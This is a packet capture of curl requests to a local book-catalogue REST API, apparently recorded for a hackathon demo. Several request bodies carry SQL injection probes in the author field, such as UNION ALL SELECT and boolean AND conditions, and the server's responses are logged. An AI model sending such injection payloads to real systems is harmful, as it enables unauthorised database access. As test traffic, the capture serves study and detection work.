21:11:02.884565 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.54128 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0x0898), seq 1:218, ack 1, win 342, options [nop,nop,TS val 5683148 ecr 5683148], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
21:11:02.884577 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54128: Flags [.], cksum 0x0028 (incorrect -> 0xe3d1), seq 1, ack 218, win 350, options [nop,nop,TS val 5683148 ecr 5683148], length 0
21:11:02.887424 IP6 (hlim 64, next-header TCP (6) payload length: 255) ::1.8080 > ::1.54128: Flags [P.], cksum 0x0107 (incorrect -> 0x0d76), seq 1:224, ack 218, win 350, options [nop,nop,TS val 5683151 ecr 5683148], length 223: HTTP, length: 223
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	59
	{"id":317,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
21:11:02.887438 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54128 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe2ec), seq 218, ack 224, win 350, options [nop,nop,TS val 5683151 ecr 5683151], length 0
21:11:02.887704 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54128: Flags [P.], cksum 0x002d (incorrect -> 0x9ec5), seq 224:229, ack 218, win 350, options [nop,nop,TS val 5683151 ecr 5683151], length 5: HTTP
21:11:02.887718 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54128 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe2e7), seq 218, ack 229, win 350, options [nop,nop,TS val 5683151 ecr 5683151], length 0
21:11:02.888048 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54128 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe2e5), seq 218, ack 229, win 350, options [nop,nop,TS val 5683152 ecr 5683151], length 0
21:11:02.888824 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54128: Flags [F.], cksum 0x0028 (incorrect -> 0xe2e3), seq 229, ack 219, win 350, options [nop,nop,TS val 5683152 ecr 5683152], length 0
21:11:02.888861 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54128 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe2e2), seq 219, ack 230, win 350, options [nop,nop,TS val 5683153 ecr 5683152], length 0
21:11:02.911164 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54130 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xbbc5), seq 17709871, win 43690, options [mss 65476,sackOK,TS val 5683175 ecr 0,nop,wscale 7], length 0
21:11:02.911196 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54130: Flags [S.], cksum 0x0030 (incorrect -> 0x1d8f), seq 3527480230, ack 17709872, win 43690, options [mss 65476,sackOK,TS val 5683175 ecr 5683175,nop,wscale 7], length 0
21:11:02.911215 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54130 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xefc0), seq 1, ack 1, win 342, options [nop,nop,TS val 5683175 ecr 5683175], length 0
21:11:02.911305 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54130 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xeb6d), seq 1:197, ack 1, win 342, options [nop,nop,TS val 5683175 ecr 5683175], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.911321 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54130: Flags [.], cksum 0x0028 (incorrect -> 0xeef4), seq 1, ack 197, win 350, options [nop,nop,TS val 5683175 ecr 5683175], length 0
21:11:02.914248 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54130: Flags [P.], cksum 0x00f2 (incorrect -> 0x0251), seq 1:203, ack 197, win 350, options [nop,nop,TS val 5683178 ecr 5683175], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	44
	{"id":318,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
21:11:02.914267 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54130 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xee24), seq 197, ack 203, win 350, options [nop,nop,TS val 5683178 ecr 5683178], length 0
21:11:02.914574 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54130: Flags [P.], cksum 0x002d (incorrect -> 0xa9fd), seq 203:208, ack 197, win 350, options [nop,nop,TS val 5683178 ecr 5683178], length 5: HTTP
21:11:02.914592 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54130 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xee1f), seq 197, ack 208, win 350, options [nop,nop,TS val 5683178 ecr 5683178], length 0
21:11:02.914981 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54130 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xee1d), seq 197, ack 208, win 350, options [nop,nop,TS val 5683179 ecr 5683178], length 0
21:11:02.915938 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54130: Flags [F.], cksum 0x0028 (incorrect -> 0xee1a), seq 208, ack 198, win 350, options [nop,nop,TS val 5683180 ecr 5683179], length 0
21:11:02.915958 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54130 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xee19), seq 198, ack 209, win 350, options [nop,nop,TS val 5683180 ecr 5683180], length 0
21:11:02.924404 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54132 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xa687), seq 2649011079, win 43690, options [mss 65476,sackOK,TS val 5683188 ecr 0,nop,wscale 7], length 0
21:11:02.924427 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54132: Flags [S.], cksum 0x0030 (incorrect -> 0xab30), seq 4208412707, ack 2649011080, win 43690, options [mss 65476,sackOK,TS val 5683188 ecr 5683188,nop,wscale 7], length 0
21:11:02.924445 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54132 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7d62), seq 1, ack 1, win 342, options [nop,nop,TS val 5683188 ecr 5683188], length 0
21:11:02.924531 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.54132 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0xbec4), seq 1:229, ack 1, win 342, options [nop,nop,TS val 5683188 ecr 5683188], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
21:11:02.924547 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54132: Flags [.], cksum 0x0028 (incorrect -> 0x7c76), seq 1, ack 229, win 350, options [nop,nop,TS val 5683188 ecr 5683188], length 0
21:11:02.926648 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54132: Flags [P.], cksum 0x0084 (incorrect -> 0x2dd2), seq 1:93, ack 229, win 350, options [nop,nop,TS val 5683190 ecr 5683188], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	Connection: close
	
21:11:02.926665 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54132 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7c1e), seq 229, ack 93, win 342, options [nop,nop,TS val 5683190 ecr 5683190], length 0
21:11:02.926773 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54132: Flags [F.], cksum 0x0028 (incorrect -> 0x7c15), seq 93, ack 229, win 350, options [nop,nop,TS val 5683190 ecr 5683190], length 0
21:11:02.926919 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54132 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x7c1b), seq 229, ack 94, win 342, options [nop,nop,TS val 5683191 ecr 5683190], length 0
21:11:02.926970 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54132: Flags [.], cksum 0x0028 (incorrect -> 0x7c12), seq 94, ack 230, win 350, options [nop,nop,TS val 5683191 ecr 5683191], length 0
21:11:02.940705 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54134 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x350b), seq 230339868, win 43690, options [mss 65476,sackOK,TS val 5683204 ecr 0,nop,wscale 7], length 0
21:11:02.940724 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54134: Flags [S.], cksum 0x0030 (incorrect -> 0x8dbd), seq 601737988, ack 230339869, win 43690, options [mss 65476,sackOK,TS val 5683204 ecr 5683204,nop,wscale 7], length 0
21:11:02.940738 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54134 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5fef), seq 1, ack 1, win 342, options [nop,nop,TS val 5683204 ecr 5683204], length 0
21:11:02.940827 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.54134 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0x5f6d), seq 1:198, ack 1, win 342, options [nop,nop,TS val 5683204 ecr 5683204], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.940860 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54134: Flags [.], cksum 0x0028 (incorrect -> 0x5f21), seq 1, ack 198, win 350, options [nop,nop,TS val 5683205 ecr 5683204], length 0
21:11:02.944069 IP6 (hlim 64, next-header TCP (6) payload length: 235) ::1.8080 > ::1.54134: Flags [P.], cksum 0x00f3 (incorrect -> 0x6360), seq 1:204, ack 198, win 350, options [nop,nop,TS val 5683208 ecr 5683204], length 203: HTTP, length: 203
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	45
	{"id":319,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
21:11:02.944088 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54134 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5e4f), seq 198, ack 204, win 350, options [nop,nop,TS val 5683208 ecr 5683208], length 0
21:11:02.944360 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54134: Flags [P.], cksum 0x002d (incorrect -> 0x1a28), seq 204:209, ack 198, win 350, options [nop,nop,TS val 5683208 ecr 5683208], length 5: HTTP
21:11:02.944397 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54134 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5e4a), seq 198, ack 209, win 350, options [nop,nop,TS val 5683208 ecr 5683208], length 0
21:11:02.944707 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54134 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x5e49), seq 198, ack 209, win 350, options [nop,nop,TS val 5683208 ecr 5683208], length 0
21:11:02.944903 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54134: Flags [F.], cksum 0x0028 (incorrect -> 0x5e47), seq 209, ack 199, win 350, options [nop,nop,TS val 5683209 ecr 5683208], length 0
21:11:02.944926 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54134 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5e46), seq 199, ack 210, win 350, options [nop,nop,TS val 5683209 ecr 5683209], length 0
21:11:02.956066 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54136 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xd985), seq 3827513894, win 43690, options [mss 65476,sackOK,TS val 5683220 ecr 0,nop,wscale 7], length 0
21:11:02.956104 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54136: Flags [S.], cksum 0x0030 (incorrect -> 0x094c), seq 3979684488, ack 3827513895, win 43690, options [mss 65476,sackOK,TS val 5683220 ecr 5683220,nop,wscale 7], length 0
21:11:02.956135 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54136 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdb7d), seq 1, ack 1, win 342, options [nop,nop,TS val 5683220 ecr 5683220], length 0
21:11:02.956259 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.54136 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0xc460), seq 1:228, ack 1, win 342, options [nop,nop,TS val 5683220 ecr 5683220], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
21:11:02.956279 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54136: Flags [.], cksum 0x0028 (incorrect -> 0xda92), seq 1, ack 228, win 350, options [nop,nop,TS val 5683220 ecr 5683220], length 0
21:11:02.958484 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.54136: Flags [P.], cksum 0x0084 (incorrect -> 0x8bee), seq 1:93, ack 228, win 350, options [nop,nop,TS val 5683222 ecr 5683220], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	Connection: close
	
